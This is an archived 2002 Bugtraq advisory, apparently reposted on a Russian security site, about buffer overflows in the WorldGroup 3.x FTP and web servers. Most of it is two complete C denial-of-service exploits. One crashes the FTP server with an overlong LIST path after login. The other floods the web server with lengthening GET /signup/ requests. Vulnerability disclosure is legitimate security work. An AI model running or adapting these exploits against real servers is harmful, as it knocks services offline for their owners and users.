Информационная безопасность
[RU] switch to English


Дополнительная информация

  Переполнения буфера в WorldGroup (buffer overflow)

From:3APA3A <3APA3A_(at)_security.nnov.ru>
Date:27 февраля 2002 г.
Subject:SECURITY.NNOV: Buffer overflows in Worldgroup

Dear bugtraq,

Topic:         buffer overflows in WorldGroup 3.0 ftp and web servers
Authors:       Limpid  Byte  team (http://lbyte.void.ru, [email protected])
Date:          February, 25 2002
Software:      WorldGroup  3.x
Vendor:        Galacticomm (http://www.gcomm.com/)
Risk:          High
Remote:        Yes
Exploitable:   Yes
Vendor Status: Not contacted, not confirmed

Details:

Limpid  Byte  team (http://lbyte.void.ru, [email protected]) reports buffer
overflows  in  WorldGroup  3.x  ftp  and  web  servers  by  Galacticomm
(http://www.gcomm.com/).

For  FTP  server overflow on long LIST command.
For HTTP overflow on long request
    GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0


Vendor:

Vendor  was  not contacted because contact information is not available
on the Web site (support only available for registered users).

Exploit:

DoS exploits by Limpid Byte team
(also available from http://www.security.nnov.ru/files/worldgroupdos.zip)

----------------- BEGIN FTP_DOS.C ---------------------
/*
       by Limpid Byte project
       http://lbyte.void.ru
       [email protected]

[Worldgroup FTP Server Denial of Service]
More than 105 "/" in LIST command.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define FOUND "220"

int main(int argc, char *argv[])
{
       int sock;
       struct sockaddr_in blah;
       struct hostent *he;
       char cgiBuff[1024];
       char *cgiPage[6];
       WSADATA wsaData;
       char cr[] = "\n";

       if (argc < 3)
       {
printf("\n\n\n\n\n\n\n\n\n\n\
n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.");
printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r  USAGE:\n\r");
printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] ");
printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous [email protected] \n");
               exit(1);
       }
       cgiPage[0] = "USER ";
       cgiPage[1] = (argv[2]);
       cgiPage[2] = "PASS ";
       cgiPage[3] = (argv[3]);
       cgiPage[4] = "PASV";
       cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/..
/*/../*/../*/../*/../*/../*/../*/../*/../\n";

       if(WSAStartup(0x101,&wsaData))
       {
               printf("Unable to initialize WinSock lib.\n");
               exit(1);
       }
printf("Let's crash the World!\n\r");
printf("Coded by the [eaSt]:\n\r");
printf("\nConnecting %s on port 21...\n\n", argv[1]);

       sock = socket(AF_INET,SOCK_STREAM,0);
       blah.sin_family=AF_INET;
       blah.sin_addr.s_addr=inet_addr(argv[1]);
       blah.sin_port=htons(21);
       if ((he = gethostbyname(argv[1])) != NULL)
       {
               memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
       }
       else
       {
               if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)
               {
               WSACleanup();
               exit(1);
               }
       }

       if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)
       {
               WSACleanup();
               exit(1);
       }
       memset(cgiBuff, 0, sizeof(cgiBuff));
       cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
       printf("<< %s", cgiBuff);
       send(sock,cgiPage[0],strlen(cgiPage[0]),0);
       send(sock,cgiPage[1],strlen(cgiPage[1]),0);
       send(sock,cr,1,0);
       memset(cgiBuff, 0, sizeof(cgiBuff));
       cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
       printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff);
       send(sock,cgiPage[2],strlen(cgiPage[2]),0);
       send(sock,cgiPage[3],strlen(cgiPage[3]),0);
       send(sock,cr,1,0);
       memset(cgiBuff, 0, sizeof(cgiBuff));
       cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
       printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff);
       send(sock,cgiPage[4],strlen(cgiPage[4]),0);
       send(sock,cr,1,0);
       memset(cgiBuff, 0, sizeof(cgiBuff));
       cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
       printf(">> %s\n<< %s", cgiPage[4], cgiBuff);
       send(sock,cgiPage[5],strlen(cgiPage[5]),0);
       send(sock,cr,1,0);
       memset(cgiBuff, 0, sizeof(cgiBuff));
       cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
       printf(">> %s\n<< %s", cgiPage[5], cgiBuff);

       printf("Try reconnect to %s\n", argv[1]);
       WSACleanup();
       return 0;
}
-----------------  END FTP_DOS.C  ---------------------

----------------- BEGIN WWW_DOS.C ---------------------
/*
       by Limpid Byte project
       http://lbyte.void.ru
       [email protected]

Worldgroup Server Denial of Service for
Windows 9x/ME only.
Error between system fuction windows and
worldgroup from web interface.
REGUEST:
GET /signup/a.[aaaaaaaa....aaaa]

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define FOUND "200"

int main(int argc, char *argv[])
{
       int sock, count;
       struct sockaddr_in blah;
       struct hostent *he;
       char cgiBuff[1024];
       WSADATA wsaData;

       if (argc < 2)
       {
               printf("\n\n\n\n\n\n\n\n\
n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n");
               printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n");
               printf(" USAGE   : www_dos.exe [HOST] \n");
               printf(" example : www_dos.exe 127.0.0.1 \n");
               exit(1);
       }

       if(WSAStartup(0x101,&wsaData))  
       {
               printf("Unable to initialize WinSock lib.\n");
               exit(1);   
       }
       printf("Let's crash the World!\n");
       printf("Coded by the [eaSt]:\n");
       printf("\nScanning %s on port 80...\n\n", argv[1]);

       for (count = 0; count < 94; count++)
       {
               sock = socket(AF_INET,SOCK_STREAM,0);
               blah.sin_family=AF_INET;
               blah.sin_addr.s_addr=inet_addr(argv[1]);
               blah.sin_port=htons(80);
               if ((he = gethostbyname(argv[1])) != NULL)
               {
                       memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
               }
               else
               {
                       if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)
                   {
                               WSACleanup();
                               exit(1);
                       }
               }

               if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)
               {
                       WSACleanup();
                       exit(1);
               }

               memset(cgiBuff, 0, sizeof(cgiBuff));
               sprintf(cgiBuff, "GET /signup/");
               memset(cgiBuff + 12, 'a', 219 + count);
               sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n");
               printf("Sending: %d symbols request\n", strlen(cgiBuff));

               send(sock,cgiBuff,strlen(cgiBuff),0);
               memset(cgiBuff, 0, sizeof(cgiBuff));
               if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {
                       printf("Crashed\n");
               }
               else {
                       cgiBuff[32] = 0;
                       if (strstr(cgiBuff,FOUND))
                       {
                               printf("Send (%s)\n", cgiBuff);
                       }
                       else
                       {
                               printf("Not Found (%s)\n", cgiBuff);
                       }
               }

               closesocket(sock);
       }

       printf("Try reconnect to %s\n", argv[1]);
       WSACleanup();
       return 0;
}
-----------------  END WWW_DOS.C  ---------------------













--
http://www.security.nnov.ru
        /\_/\
       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                   |/
You know my name - look up my number (The Beatles)

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород